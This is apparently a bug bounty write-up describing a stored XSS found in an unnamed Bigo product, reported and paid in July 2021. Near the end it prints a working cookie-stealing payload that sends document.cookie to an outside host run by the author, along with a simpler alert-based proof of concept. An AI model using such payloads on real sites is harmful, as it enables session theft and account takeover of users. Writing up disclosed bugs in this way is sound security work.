($380) XSS STORED in Bigo Bug Bounty Program
Assalamualaikum Bug Hunter and Hallo Everyone.
How are you?
I hope you are all well.
This time I will share about writing up bug findings in the Bigo Bug Bounty Program.
This discovery began after I managed to find a vulnerability from the Bigo Bug Bounty program. At that time I thought that the same vulnerability I found earlier was either no longer there or had been completely fixed by Bigo SRC. When I have free time, I try to find it again and check it again. And I got a similar vulnerability before. Come follow me :D
The vulnerability I found was in the form of XSS STORED. Sorry if I didn’t mention which app these findings are in. Because Bigo SRC did not give me permission to name the product I found the vulnerability.
And this started when I found a feature POST data from the application to the website.
Then I tried to POST the data from the application by entering the payload:
“><img src=x onerror=alert(document.domain)>
When I see the POST data result on the product’s official website, and the payload is executed :D
I was surprised to see that. Then a pop up appears.
Maybe I think this is enough to report to them. When I’ve sent a report to them, and they responded.
Something interesting here, where they asked me to take cookies.
Then I tried to fetch cookies from XSS HUNTER payload.
And see, it doesn’t work, the POST input only allows 120 words.
I’m confused, how to get a cookie with a payload of 120 words?
At that time I immediately looked for references from articles on google and I got the solution, namely with XSS Cookie Stealling.
Here’s the reference :
This is a basic Reflected XSS attack to steal cookies from a user of a vulnerable website. The attack string comes from…
Membuat XSS Cookie Stealer | Mukhammad Akbar
Next I created a php and txt file on my hosting.
Final payload :
“><img src=x onerror=this.src=’https://herroid1337.000webhostapp.com/m.php?cok='+document.cookie>
And the cookie has been captured.
Then I reported this to them, and finally my report was received with a HIGH severity status.
Report : 12/07/2021
Valid : 13/07/2021
Severity : HIGH
Bounty : $380